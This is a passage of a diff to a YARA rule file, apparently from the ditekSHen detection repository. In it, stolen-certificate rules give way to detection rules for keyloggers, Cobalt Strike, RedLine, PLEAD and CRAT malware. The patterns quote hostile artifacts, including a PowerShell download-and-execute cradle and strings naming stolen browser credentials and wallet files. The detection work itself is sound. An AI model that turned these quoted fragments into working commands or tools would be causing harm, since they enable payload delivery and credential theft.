+		$s10 = "Username (Computername):" wide
+		$s11 = "Operating system language:" wide
+		$s12 = "/index.php" wide
+		$f1 = "*ledger*.txt" fullword wide
+		$f2 = "*crypto*.xlsx" fullword wide
+		$f3 = "*private*.txt" fullword wide
+		$f4 = "*wallet*.dat" fullword wide
+		$f5 = "*pass*.txt" fullword wide
+		$f6 = "*bitcoin*.txt" fullword wide
+		$p1 = "%USERPROFILE%\\Desktop\\*.txt" fullword wide
+		$p2 = "%USERPROFILE%\\Desktop\\secret.txt" fullword wide
+		$p3 = "%USERPROFILE%\\Desktop\\report.doc" fullword wide
+		$pattern1 = /(files_|_Files)\\(_?)(cookies|cryptocurrency|forms|passwords|system_info|screenshot|screen_desktop|information|files|wallet|cc|Coinomi)\\?(\.txt|\.jpg|\.jpeg)?/ ascii wide nocase
+		$pattern2 = /%(s|ws)\\%(s|ws)\\(Login Data|Cookies|Web Data)/ fullword wide
+		$pattern3 = /(_AllPasswords_list.txt|_AllForms_list.txt|_AllCookies_list.txt|_All_CC_list.txt|_Information.txt|_Info.txt|_Screen_Desktop.jpeg)/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" )
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 1 of ( $p* ) ) or ( 4 of ( $s* ) and 1 of ( $f* ) and 1 of ( $p* ) ) or ( 2 of ( $pattern* ) and 3 of ( $s* ) ) or ( #pattern1 > 6 and ( 2 of ( $s* ) or 1 of ( $p* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_510C5E540503F30C9Caa3082296Aa452 : FILE
+rule DITEKSHEN_MALWARE_Win_Matiex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Matiex/XetimaLogger keylogger payload"
 		author = "ditekSHen"
-		id = "eddbe6f1-fb7c-5129-afb4-6b4d67e39f60"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "61803e0c-8f6a-5ded-855a-ff26eed1384f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5033-L5045"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1768-L1788"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "cb01f31a322572035cf19f6cda00bcf1d8235dcc692588810405d0fc6e8d239c"
-		logic_hash = "9b6ad8b3e90fcd63f86b353e89ce7e6226197bfcb491e2151b8dbf580466076e"
+		logic_hash = "62b45c43d99bef93a6c0e72200b869fdce331f8fa325640df7d8b72af56a3ef2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "3e56a13ceb87243b8b2c5de67da54a3a9e0988d7"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.MatiexKeylogger"
+
+	strings:
+		$id = "--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--" ascii wide
+		$s1 = "StartKeylogger" fullword ascii
+		$s2 = "_KeyboardLoggerTimer" ascii
+		$s3 = "_ScreenshotLoggerTimer" ascii
+		$s4 = "_VoiceRecordLogger" ascii
+		$s5 = "_ClipboardLoggerTimer" ascii
+		$s6 = "get_logins" fullword ascii
+		$s7 = "get_processhackerFucked" fullword ascii
+		$s8 = "_ThePSWDSenders" fullword ascii
+		$pdb = "\\Before FprmT\\Document VB project\\FireFox Stub\\FireFox Stub\\obj\\Debug\\VNXT.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Analysis 360 Ltd" and pe.signatures [ i ] . serial == "51:0c:5e:54:05:03:f3:0c:9c:aa:30:82:29:6a:a4:52" )
+		uint16( 0 ) == 0x5a4d and ( $id or 4 of ( $s* ) or ( $pdb and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56Bba7Fe242E6B49695Bcf07870F5F5E : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingkeylogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing Keylogger payload"
 		author = "ditekSHen"
-		id = "902c1949-81e6-5070-ac60-2ebbb363fc6d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f9c84241-6db2-5243-9bea-2165104cb0c3"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5047-L5058"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1790-L1805"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6c9da28b90bcff069509fc8e91c0a960805bb8339d0fa21f5466c38b6d20f95f"
+		logic_hash = "80d8cabfd02cd73e19e6cf1c2a8a5f06c5b3b502fe4f07289e92b448425aaa6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3c176bff246a30460311e8c71f880cad2a845164"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.IAmTheKingKeylogger"
+
+	strings:
+		$s1 = "[TIME:]%d/%d/%d %02d:%02d:%02d" fullword ascii
+		$s2 = "[TITLE:]" fullword ascii
+		$s3 = "%s-%02d-%02d-%02d-%02d" fullword ascii
+		$s4 = "[DATA]:" fullword ascii
+		$s5 = "[BK]" fullword ascii
+		$s6 = "Log.txt" fullword ascii
+		$s7 = "sonme hting is wrong x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ewGMiQgCHj" and pe.signatures [ i ] . serial == "56:bb:a7:fe:24:2e:6b:49:69:5b:cf:07:87:0f:5f:5e" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Dfef1A8C0Dbfef64Bc6C8A0647D6E873 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingscrcap : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing screen capture payload"
 		author = "ditekSHen"
-		id = "a8e2a271-399f-531a-8e69-27a1598ba086"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ba385194-9578-568c-b908-bc4fc742e52e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5060-L5071"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1807-L1821"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "104f066ddfd34edc328844d06a84a1663b0d271c02599825c1797704e582883a"
+		logic_hash = "594ddad4e08bad51f90de1c4299e28b4800b4fa686bd4176e406ba401a1242ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0709cdcb27230171877e2a11e6646a9fde28e02c"
-		importance = 20
+
+	strings:
+		$s1 = "@MyScreen.jpg" fullword wide
+		$s2 = "DISPLAY" fullword wide
+		$s3 = ".?AVCImage@ATL@@" fullword ascii
+		$s4 = ".?AVGdiplusBase@Gdiplus@@" fullword ascii
+		$s5 = ".?AVImage@Gdiplus@@" fullword ascii
+		$s6 = ".?AVBitmap@Gdiplus@@" fullword ascii
+		$s7 = ".?AVCAtlException@ATL@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NnTqRHlSFNJSUHGaiKWzqyHGdPzBarblmWEzpKHvkZrqn" and pe.signatures [ i ] . serial == "00:df:ef:1a:8c:0d:bf:ef:64:bc:6c:8a:06:47:d6:e8:73" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0609B5Aad2Dfb81Fbe6B75E4Cfe372A6 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingkingofhearts : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing King Of Hearts payload"
 		author = "ditekSHen"
-		id = "db7bf2e3-f514-5133-a35a-87c43a5f12cf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "95c73ec0-75b0-5d46-87da-b30feb170716"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5073-L5084"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1823-L1843"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2f483d06fd7af8db8e79203dcd4252d74f4859c0681e0bfcc4a97b351cb758a9"
+		logic_hash = "75b6dd0ebb90fd04f9e4a0b1fc6a1bbf417fc66daad24c8b01f0390f6155ec55"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a30013d7a055c98c4bfa097fe85110629ef13e67"
-		importance = 20
+
+	strings:
+		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
+		$s2 = "LookupAccountSid Error %u" fullword ascii
+		$s3 = "CreateServiceErrorID:%d" fullword ascii
+		$s4 = "In ControlServiceErrorID:%d" fullword ascii
+		$s5 = "In QueryServiceStatus ErrorID:%d" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
+		$s7 = "hello%s" fullword ascii
+		$s8 = "additional header failed..." fullword ascii
+		$s9 = "Set Option failed errcode: %ld" fullword ascii
+		$s10 = "add cookie failed..." fullword ascii
+		$u1 = "Mozilla/4.0 (compatible; )" fullword ascii
+		$u2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "vVBhgeghjdigSdWYSAdmy" and pe.signatures [ i ] . serial == "06:09:b5:aa:d2:df:b8:1f:be:6b:75:e4:cf:e3:72:a6" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $u* ) and 4 of ( $s* ) ) or ( all of ( $u* ) and 3 of ( $s* ) ) or ( 5 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02B6656292310B84022Db5541Bc48Faf : FILE
+rule DITEKSHEN_MALWARE_Win_Cobaltstrike : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "CobaltStrike payload"
 		author = "ditekSHen"
-		id = "252c8339-73d3-5de0-8f75-78a6a2da4abc"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "140e16d0-0102-5650-a371-c95013d7f021"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5086-L5097"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1845-L1864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "374f7abfab6f7def8b895dc9536ca6bb7a605e9478934af6c97e8b7595fbee19"
+		logic_hash = "43513aef0ed715f0c214d7a14e465350f9c1bcadf87535e1c12561e976398bb3"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "bb58a3d322fd67122804b2924ad1ddc27016e11a"
-		importance = 20
+
+	strings:
+		$s1 = "%%IMPORT%%" fullword ascii
+		$s2 = "www6.%x%x.%s" fullword ascii
+		$s3 = "cdn.%x%x.%s" fullword ascii
+		$s4 = "api.%x%x.%s" fullword ascii
+		$s5 = "%s (admin)" fullword ascii
+		$s6 = "could not spawn %s: %d" fullword ascii
+		$s7 = "Could not kill %d: %d" fullword ascii
+		$s8 = "Could not connect to pipe (%s): %d" fullword ascii
+		$s9 = /%s\.\d[(%08x).]+\.%x%x\.%s/ ascii
+		$pwsh1 = "IEX (New-Object Net.Webclient).DownloadString('http" ascii
+		$pwsh2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $pwsh* ) and 2 of ( $s* ) ) or ( #s9 > 6 and 4 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D609B6C95428954A999A8A99D4F198Af : FILE
+rule DITEKSHEN_MALWARE_Win_Redlinedropperahk : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AutoIt/AutoHotKey executables dropping RedLine infostealer"
 		author = "ditekSHen"
-		id = "e1b732d2-24fd-5819-a26a-049a9a569089"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "16eee826-f1fd-5a6f-b6f3-e02ccd889614"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5099-L5110"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1866-L1878"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62eecc7cf240b9de6e04a43413bbeb84b673e9d3f1c4d67ec4082c099c6a87db"
+		logic_hash = "0950fe9daa02f3a8fd527f75275766111be7e8774578963b0bdb455800dfc4f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b1d8033dd7ad9e82674299faed410817e42c4c40"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-AHK"
+
+	strings:
+		$s1 = ".SetRequestHeader(\"User-Agent\",\" ( \" OSName \" | \" bit \" | \" CPUNAme \"\"" ascii
+		$s2 = ":= \" | Windows Defender\"" ascii
+		$s3 = "WindowSpy.ahk" wide
+		$s4 = ">AUTOHOTKEY SCRIPT<" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6A568F85De2061F67Ded98707D4988Df : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known downloader agent"
 		author = "ditekSHen"
-		id = "ed8748ce-cd90-527b-a58e-da9c7164ed18"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "85ead6fd-b56e-5e78-8fb4-7c9ecb4c0b58"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5112-L5123"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1880-L1894"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1aea9f6237cfbda49fea6d38ece935f9d4cc5abc678590c63b9a339aa37e104"
+		logic_hash = "7aec81655af9b779a314c3e2cff933aa6426fcfe21b5a87e60e159c7e7f5238a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ed7e16a65294086fbdeee09c562b0722fdb2db48"
-		importance = 20
+		snort_sid = "920007"
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent01"
+
+	strings:
+		$s1 = "Mozilla/5.0 Gecko/41.0 Firefox/41.0" fullword wide
+		$s2 = "/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List" fullword wide
+		$s3 = "GUID.log" fullword wide
+		$s4 = "NO AV" fullword wide
+		$s5 = "%d:%I64d:%I64d:%I64d" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F90E68Cbf92Fd7Ad409E281C3F2A0F0A : FILE
+rule DITEKSHEN_MALWARE_Linux_PLEAD : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "PLEAD Linux payload"
 		author = "ditekSHen"
-		id = "e92daa7b-2d8a-5806-840e-678a9aa24fef"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "07aa0561-d6d9-53b6-97ac-670cdf04335d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5125-L5137"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1896-L1920"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "d79a8f491c0112c3f26572350336fe7d22674f5550f37894643eba980ae5bd32"
-		logic_hash = "ca8d80a446df0c28e9fb4944bd69d9fa008be968c449e5a469b182fbf8744a3f"
+		logic_hash = "539998248ded0eb8ea1702c527804f89cfd55412f17ec699bd0af801f4fba673"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c202564339ddd78a1ce629ce54824ba2697fa3d6"
-		importance = 20
+		clamav_sig = "MALWARE.Linux.Trojan.PLEAD"
+
+	strings:
+		$x1 = "CFileTransfer" ascii
+		$x2 = "CFileManager" ascii
+		$x3 = "CPortForward" ascii
+		$x4 = "CPortForwardManager" ascii
+		$x5 = "CRemoteShell" ascii
+		$x6 = "CSockClient" ascii
+		$s1 = "/proc/self/exe" fullword ascii
+		$s2 = "/bin/sh" fullword ascii
+		$s3 = "echo -e '" ascii
+		$s4 = "%s    <DIR>    %s" ascii
+		$s5 = "%s    %lld    %s" ascii
+		$s6 = "Files: %d        Size: %lld" ascii
+		$s7 = "Dirs: %d" ascii
+		$s8 = "%s(%s)/" ascii
+		$s9 = "%s %s %s %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUCK-MY-DICK-ESET" and pe.signatures [ i ] . serial == "f9:0e:68:cb:f9:2f:d7:ad:40:9e:28:1c:3f:2a:0f:0a" )
+		uint16( 0 ) == 0x457f and ( all of ( $x* ) or all of ( $s* ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7Ddd3796A427B42F2E52D7C7Af0Ca54F : FILE
+rule DITEKSHEN_MALWARE_Win_CRAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CRAT main DLL"
 		author = "ditekSHen"
-		id = "2619669f-cceb-5177-9738-d28236e1344e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9757a8de-61ea-55c0-b64c-055798450985"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5139-L5150"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1922-L1944"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15df43212a842936e2ea0d834797f11fe80af3d376a19aa9a806aa6ed793e679"
+		logic_hash = "5a9fef68e110a1564dd5956408abcc3736cfa6853e1ac5510a089cc68f6bdc35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b5cd5a485dee4a82f34c98b3f108579e8501fdea"
-		importance = 20
+
+	strings:
+		$s1 = "cmd /c \"dir %s /s >> %s\"" wide
+		$s2 = "Set-Cookie:\\b*{.+?}\\n" wide
+		$s3 = "Location: {[0-9]+}" wide
+		$s4 = "Content-Disposition: form-data; name=\"%s\"; filename=\"" ascii
+		$s6 = "%serror.log" wide
+		$v2x_1 = "?timestamp=%u" wide
+		$v2x_2 = "config.txt" wide
+		$v2x_3 = "entdll.dll" wide
+		$v2x_4 = "\\cmd.exe" wide
+		$v2x_5 = "[MyDocuments]" wide
+		$v2x_6 = "@SetWindowTextW FindFileExA" wide
+		$v2x_7 = "Microsoft\\Windows\\WinX\\Group1\\*.exe" wide
+		$v2s_1 = "Installed Anti Virus Programs" ascii
+		$v2s_2 = "Running Processes" ascii
+		$v2s_3 = "id=%u&content=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $v2x* ) or all of ( $v2s* ) or ( 2 of ( $v2s* ) and 4 of ( $v2x* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_17D99Cc2F5B29522D422332E681F3E18 : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginkeylogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CRAT keylogger plugin DLL"
 		author = "ditekSHen"
-		id = "98493d50-2bee-50a5-93f3-851559c494a6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a8682786-7704-56f0-a6df-b4e2ab4d7536"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5152-L5163"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1946-L1962"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "95116d1114239795707b310afea3122d274dac471546de1e0147992d1f3a1d4f"
+		logic_hash = "58ef1f7466fcc871be2e74aa447c76970fd90c9d9d345a896fb8e6335114d189"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "969932039e8bf3b4c71d9a55119071cfa1c4a41b"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.CRAT"
+
+	strings:
+		$ai1 = "VM detected!" fullword wide
+		$ai2 = "Sandbox detected!" fullword wide
+		$ai3 = "Debug detected!" fullword wide
+		$ai4 = "Analysis process detected!" fullword wide
+		$s1 = "Create KeyLogMutex %s failure %d" wide
+		$s2 = "Key Log Mutex already created! %s" wide
+		$s3 = /KeyLogThread\s(started|finished|terminated)!/ wide
+		$s4 = /KeyLog_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02De1Cc6C487954592F1Bf574Ca2B000 : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginclipboardmonitor : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CRAT Clipboad Monitor plugin DLL"
 		author = "ditekSHen"
-		id = "1dc1b576-34f4-5017-8340-c6f58692a31c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "587487c7-f00b-5d4a-8b18-e46d6c6560e2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5165-L5176"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1964-L1979"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5963377fee755a859bc4330a1094ea1c8b2b588133706a22f67c1fb85542e64f"
+		logic_hash = "c3e692a06388e143a8e1053e75a6eb6a82da5bdf26d38e3a0e339bc20d8312a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e35804bbf4573f492c51a7ad7a14557816fe961f"
-		importance = 20
+
+	strings:
+		$ai1 = "VM detected!" fullword wide
+		$ai2 = "Sandbox detected!" fullword wide
+		$ai3 = "Debug detected!" fullword wide
+		$ai4 = "Analysis process detected!" fullword wide
+		$s1 = "Clipboard Monitor Mutex [%s] already created!" wide
+		$s2 = "ClipboardMonitorThread started!" fullword wide
+		$s3 = /MonitorClipboardThread\s(finished|terminated)!/ wide
+		$s4 = /ClipboardMonitor_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_142Aac4217E22B525C8587589773Ba9B : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginscreencapture : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CRAT Screen Capture plugin DLL"
 		author = "ditekSHen"
-		id = "86ef1337-71cc-5231-a31c-8d8a8d95873f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ef0b6b88-8b1b-5ab5-ad81-276eaff0411f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5178-L5188"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1981-L2000"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0abe691c6b0a7be8ceea313068a6943d611b1424a1a03e43b82239ddfe9cbd2"
+		logic_hash = "7b4378ae883d01338fabe2eb50a5509b722c661e63afc287afa07b263a0ebc42"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b15a4189dcbb27f9b7ced94bc5ca40b7e62135c3"
-		importance = 20
+
+	strings:
+		$ai1 = "VM detected!" fullword wide
+		$ai2 = "Sandbox detected!" fullword wide
+		$ai3 = "Debug detected!" fullword wide
+		$ai4 = "Analysis process detected!" fullword wide
+		$s1 = "User is inactive!, give up capture" wide
+		$s2 = "Capturing screen..." wide
+		$s3 = "%s\\P%02d%lu.tmp" fullword wide
+		$s4 = "CloseHandle ScreenCaptureMutex failure! %d" fullword wide
+		$s5 = "ScreenCaptureMutex already created! %s" fullword wide
+		$s6 = "Create ScreenCaptureMutex %s failure %d" fullword wide
